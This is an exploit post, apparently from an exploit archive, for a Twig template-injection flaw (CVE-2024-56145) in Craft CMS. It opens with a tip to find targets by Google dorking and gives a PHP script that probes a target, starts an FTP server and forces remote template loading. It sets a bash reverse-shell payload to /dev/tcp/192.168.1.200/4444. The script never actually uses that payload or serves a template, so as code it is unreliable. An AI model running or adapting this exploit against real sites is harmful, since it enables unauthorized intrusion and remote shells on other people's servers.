=============================================================================================================================================
| # Title     : Craft CMS 3.9.14 Remote Command Execution vulnerability                                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://craftcms.com/docs/getting-started-tutorial/build/twig.html                                                          |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to remote code execution.

    (Related : https://packetstorm.news/files/id/188825/ Related CVE numbers:	CVE-2024-56145 ) .
	
[+] Payload : 

[+] Set Target : line 52

[+] Usage : php poc.php 

[+] PayLoad :

<?php

class Exploit {
    private $target;
    private $ftp_host;
    private $ftp_port;
    private $payload;
    
    public function __construct($target, $ftp_host, $ftp_port, $payload) {
        $this->target = $target;
        $this->ftp_host = $ftp_host;
        $this->ftp_port = $ftp_port;
        $this->payload = $payload;
    }
    
    public function checkVulnerability() {
        $nonce = bin2hex(random_bytes(4));
        $url = $this->target . '?--configPath=/' . $nonce;
        $response = file_get_contents($url);
        
        if (strpos($response, 'mkdir()') !== false && strpos($response, $nonce) !== false) {
            return true;
        }
        return false;
    }
    
    public function startFTPServer() {
        $ftp_command = "python3 -m pyftpdlib -p {$this->ftp_port} &";
        shell_exec($ftp_command);
    }
    
    public function triggerExploit() {
        $templatesPath = "ftp://{$this->ftp_host}:{$this->ftp_port}";
        $url = $this->target . "?--templatesPath=" . urlencode($templatesPath);
        file_get_contents($url);
    }
    
    public function execute() {
        if ($this->checkVulnerability()) {
            echo "[+] Target is vulnerable. Starting exploit...\n";
            $this->startFTPServer();
            sleep(2); // Allow FTP server to start
            $this->triggerExploit();
            echo "[+] Exploit triggered successfully.\n";
        } else {
            echo "[-] Target is not vulnerable.\n";
        }
    }
}

// Example Usage
$target = "http://example.com";
$ftp_host = "192.168.1.100";
$ftp_port = 2121;
$payload = "bash -c 'bash -i >& /dev/tcp/192.168.1.200/4444 0>&1'";

$exploit = new Exploit($target, $ftp_host, $ftp_port, $payload);
$exploit->execute();

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================